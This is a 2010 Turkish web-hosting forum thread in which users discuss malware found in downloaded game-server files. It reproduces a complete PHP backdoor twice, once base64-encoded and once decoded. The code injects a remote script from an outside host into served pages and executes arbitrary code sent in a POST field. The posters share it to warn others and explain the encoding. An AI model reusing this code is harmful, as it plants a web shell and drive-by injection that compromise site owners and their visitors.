• 04-08-2010, 01:07:41
    #10
    Üyeliği durduruldu
    oNuRkAn adlı üyeden alıntı: mesajı görüntüle
    mümkün değilmi bazı .css uzantılı virüs ve trojenler var hiç onlarla karşı karşıya gelmedin sanırım gelirsen ne demek istediğimi anlarsın. Tabi benim ordaki dediğim olay sunucu güvenliği ile alakalı tedbir alırsan böyle birşey olmaz.

    Envayi çeşidi ile karşılaştım ama .css dosyası gibi kendi kendine çalışamayan bir dosya nasıl diğer dosyalara kendini bulaştırabilecek?

    Virüslerin çalışma mantığını öncelikle anlaman lazım. Windowsda bile virüslü bir exe dosyasını çalıştırmadığın sürece diskinde dururken kendi kendine çalışıp etrafa yayılamaz. Kısaca virüsü bir şeyin tetiklemesi lazım.
  • 04-08-2010, 01:11:02
    #11
    Üyeliği durduruldu
    performansodev adlı üyeden alıntı: mesajı görüntüle
    evet haklıymışsın kaspersky ile taradım 50 ye yakın virüs cikti
    Bu co-cuce server files dosyaları vardı
    servere indirmiştim
    vps oyun server kurmak için hep onların içinden cikti bu virüsler
    ne zamandır bu virüsler ile uğraşıyorum

    kaynağı oymuş belli oldu
    nod 32 bi halta yaramadı
    kasper 2011 yükledim internet security
    gayet başarılı 30 gün deneme sürümü var ztn
    gayet güzel oldu

    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndD d4bGYnKSl7ZnVuY3Rpb24gdDd4bGYoJHMpe2lmKHByZWdfbWF0 Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcy wkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9k ZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW1 5cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8 fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLC R2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYo JGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJi ZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9y ZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJy M8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcm VnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlsw LTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJi Yhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMjl5WW1WbGN5NWpiMjB2YzNObWJT OXZjbUpsWlhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJH MpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBs YWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbH NlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRz O31mdW5jdGlvbiB0N3hsZjIoJGEsJGIsJGMsJGQpe2dsb2JhbC R0N3hsZjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMo JHQ3eGxmMSkpY2FsbF91c2VyX2Z1bmMoJHQ3eGxmMSwkYSwkYi wkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYp aWYoKCRhPSR2WyduYW1lJ10pPT0ndDd4bGYnKXJldHVybjtlbH NlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1td PWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS 0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5k X2NsZWFuKCk7fW9iX3N0YXJ0KCd0N3hsZicpO2ZvcigkaT0wOy RpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0p O2VjaG8gJHNbJGldWzFdO319fSR0N3hsZmw9KCgkYT1Ac2V0X2 Vycm9yX2hhbmRsZXIoJ3Q3eGxmMicpKSE9J3Q3eGxmMicpPyRh OjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7') ); ?><?php
    header("Location: ../index.php");
    ?>
    şeklinde
    64 bit şifrelenmiş virüsler cikti
    yeni dikkat ettim

    vay bea adamlar kendini geliştirmiş 64 bit şifreleyerek artık virüsleri yerleştiriyorlar oda güzel herkes dikkat etsin
    64 bit şifreleme değil bu base64 şifrelenmiş kod. Yani bakınca ne olduğunu hemen anlama diye adam base64 decode etmiş.

    Verdiğin kodun açık hali

    if(!function_exists('t7xlf')){function t7xlf($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match(' #[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}if (preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s =preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode ('PHNjcmlwdCBzcmM9aHR0cDovL29yYmVlcy5jb20vc3NmbS9v cmJlZXMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($ s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1 ',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;} function t7xlf2($a,$b,$c,$d){global$t7xlf1;$s=array();if(fu nction_exists($t7xlf1))call_user_func($t7xlf1,$a,$ b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='t7xlf')return;elseif($a=='ob_gzhandler')break; else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('t7xlf ');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$t7xlfl=(($a=@set_error_handler('t7xlf2'))!='t 7xlf2')?$a:0;eval(base64_decode($_POST['e']));